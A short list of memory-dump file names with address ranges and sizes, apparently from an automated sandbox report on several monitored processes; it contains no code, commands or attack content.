- memory/1472-81-0x0000000001390000-0x0000000001391000-memory.dmp, Filesize: 4KB
- memory/1472-79-0x0000000000000000-mapping.dmp
- memory/1592-76-0x0000000002222000-0x0000000002224000-memory.dmp, Filesize: 8KB
- memory/1592-75-0x0000000002221000-0x0000000002222000-memory.dmp, Filesize: 4KB
- memory/1592-74-0x0000000002220000-0x0000000002221000-memory.dmp, Filesize: 4KB
- memory/1592-73-0x0000000004BA0000-0x00000000050D6000-memory.dmp, Filesize: 5.2MB
- memory/1592-70-0x0000000000000000-mapping.dmp
- memory/1732-92-0x00000000002B0000-0x00000000002C5000-memory.dmp, Filesize: 84KB
- memory/1732-94-0x00000000002F0000-0x0000000000305000-memory.dmp, Filesize: 84KB
- memory/1732-91-0x0000000000930000-0x0000000000C33000-memory.dmp, Filesize: 3.0MB
- memory/1732-89-0x000000000041F1B0-mapping.dmp
- memory/1732-88-0x0000000000400000-0x000000000042F000-memory.dmp, Filesize: 188KB
- memory/1748-69-0x0000000004AF0000-0x0000000005026000-memory.dmp, Filesize: 5.2MB
- memory/1748-68-0x0000000002590000-0x00000000031DA000-memory.dmp, Filesize: 12.3MB
- memory/1748-66-0x0000000000000000-mapping.dmp
- memory/1812-61-0x0000000000000000-mapping.dmp